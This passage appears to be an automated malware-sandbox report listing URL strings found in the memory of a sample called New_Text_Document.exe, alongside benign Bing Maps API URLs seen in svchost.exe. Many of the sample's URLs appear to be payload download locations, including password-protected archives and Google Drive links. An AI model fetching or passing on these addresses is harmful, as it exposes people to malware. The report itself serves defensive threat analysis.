                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.0000000003621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://creapb.org.br/ch/
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://creativeignite.com/evl/
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://crz.de/info/access.txt
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000035DA000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cuboplace.com.br/pio/
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cursodeparapsicologia.org/tz5mgy9.jpg
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://d7.fajridemo.com/agenzia/
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://d7.fajridemo.com/connect/
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://d7.fajridemo.com/scarica/
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dacsandongthapmuoi.vn/system/cron/HwOtNCFo/
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000035DA000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://daewooservicecentreauthorized.com/iiai/
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://danaevara.com/d9it9p.rar
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://daughtersofkenya.org/bdt/
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000035DA000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://decatoria.com/si/
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://deputadoevandroaraujo.com.br/ma/
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://derekludlow.com/agenzia/
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://derekludlow.com/connect/
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://derekludlow.com/scarica/
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dessertartbydeepali.com/de/
                    Source: svchost.exe, 00000006.00000003.1368426234.0000020CEEA61000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.1381946680.0000020CEEA62000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/V1/MapControlConfiguration/native/
                    Source: svchost.exe, 00000006.00000003.1372813979.0000020CEEA41000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.1382326384.0000020CEEA70000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.1381330295.0000020CEEA42000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1372112060.0000020CEEA59000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1367559728.0000020CEEA6E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1368426234.0000020CEEA61000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1373533755.0000020CEEA65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
                    Source: svchost.exe, 00000006.00000002.1382326384.0000020CEEA70000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1367559728.0000020CEEA6E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/
                    Source: svchost.exe, 00000006.00000003.1372907688.0000020CEEA57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.1381581903.0000020CEEA58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
                    Source: svchost.exe, 00000006.00000002.1382059296.0000020CEEA68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
                    Source: svchost.exe, 00000006.00000003.1367468204.0000020CEEA75000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.1382504816.0000020CEEA77000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Transit/Stops/
                    Source: svchost.exe, 00000006.00000003.1372907688.0000020CEEA57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.1381581903.0000020CEEA58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
                    Source: svchost.exe, 00000006.00000002.1381211270.0000020CEEA3F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1372112060.0000020CEEA59000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1368426234.0000020CEEA61000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1373533755.0000020CEEA65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Imagery/Copyright/
                    Source: svchost.exe, 00000006.00000003.1372907688.0000020CEEA57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.1381581903.0000020CEEA58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Locations
                    Source: svchost.exe, 00000006.00000003.1368329269.0000020CEEA67000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.1380944116.0000020CEEA2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.1382059296.0000020CEEA68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
                    Source: svchost.exe, 00000006.00000003.1372907688.0000020CEEA57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.1381581903.0000020CEEA58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
                    Source: svchost.exe, 00000006.00000003.1372907688.0000020CEEA57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.1381581903.0000020CEEA58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
                    Source: svchost.exe, 00000006.00000003.1372907688.0000020CEEA57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.1381581903.0000020CEEA58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
                    Source: svchost.exe, 00000006.00000002.1381211270.0000020CEEA3F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1368426234.0000020CEEA61000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1373533755.0000020CEEA65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Traffic/Incidents/
                    Source: svchost.exe, 00000006.00000002.1381330295.0000020CEEA42000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
                    Source: svchost.exe, 00000006.00000003.1372907688.0000020CEEA57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.1381581903.0000020CEEA58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
                    Source: svchost.exe, 00000006.00000003.1368426234.0000020CEEA61000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.1381946680.0000020CEEA62000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://devises-dz.com/sdf/Install_pass1234.7z
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?export=download&id=11mi132ptX9rjLBgeX4Ep7QabjI8v7urn
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?export=download&id=140vkYFrFHBQKuKc2hNW-gSvi5wjw6IYI
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?export=download&id=162EQPlutnZ1zKvzpMxfzZncvQ91-s7vY
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?export=download&id=1CtmYWLj5woUiug1WgIZy3kE7YJ1u0YoR&revid=0B_t0-zked1mGa
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?export=download&id=1Fr2Yz05wbB5UkIFzr-zQtOc-WKUXBAZd
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?export=download&id=1GV_Nk9lLqw4fxUdO-khJA7NUUJ1KEvvw&revid=0B7ZeFP-G6n7vM
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?export=download&id=1H_DyP_d5Lst4Akyf2QEzXL7J1SCVbtVs&revid=0B5thCKui5i0md
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?export=download&id=1HdvMpSuLSDwMfbdUwezpKhyQscVaujpZ&revid=0BxUZ33-vsvVtT
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?export=download&id=1JPL-UoUydm5HypQM67uokyDdrbLbpxvW&revid=0B7zpIPRmOC5Ub
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?export=download&id=1JXxc4l7Icdzs0zx0iZ7hayfgLRuJM8RO
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.0000000003621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?export=download&id=1MbXcfxtfTGmJOZW64TQu-7odXzGmfezR
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?export=download&id=1SbD1rnw8lUztJMSH6GDlZUPVyUPBopa0&revid=0B3yyJTs_WOKLR
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?export=download&id=1Uh8SquZ6Doag3ywzn7RpX0k5JfzE9r6D
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?export=download&id=1YGn4gkmy9mUSDp_LgNPyJjh6RSKT39vP&revid=0B8rbGP2BpEOfM
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?export=download&id=1c6TGO9Uoo-XXVvecMZziMumZNZj34BPi
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?export=download&id=1yzWZ8xvcdGBFyXUfaBtoEPWIJpZHzc7h
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?export=download&id=1zi5uoSAhLmn8UiXKVr0NXPyKCXt2fQtA
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dokumentasoluciones.com/wp-content/download/File_pass1234.7z
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://donkeytourscroatia.com/agenzia/
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://donkeytourscroatia.com/connect/
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://donkeytourscroatia.com/scarica/
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://doorbell.api.net.bd/ss/
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000035DA000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dphcp.org/lm/
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dpp.hn/tun/
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/u/0/uc?id=13St0dUhd4Buy1KbpRqwPj_J7cAAeG8VH&export=download
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/u/0/uc?id=1971Nn11jts-J0FMdyN1Kow_zR8SzVSJo&export=download
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/u/0/uc?id=1PRFXr7v6xWFvJnK9NLCnB5U0LeQYDZLg&export=download/?q=
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/u/0/uc?id=1vi2Wqh_ZCPD3B6Thl70MDFlFywPAJESa&export=download
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/u/1/uc?id=1UQ00QOGhsvRDaAyrU6cJrD9pCtx-DkNV&export=download
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?cliviu_1
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&confirm=no_antivirus&id=1-5tfbyC52TEpaBxJDSZG1DcqgaIZF0M
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&confirm=no_antivirus&id=11WhDE3Xy7c5AkKS24P0EzS8S8LUNjIA
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&confirm=no_antivirus&id=1CpAqImEblBmXrXOli6D3cCZGkrbzpy8
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&confirm=no_antivirus&id=1aCPnDtVzYyTvPhEcv0Wh_jDG3Y5tPyM
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.0000000003621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&confirm=no_antivirus&id=1ahEixMEYK7SY6uLO4LBRx4f9LM0jeKc
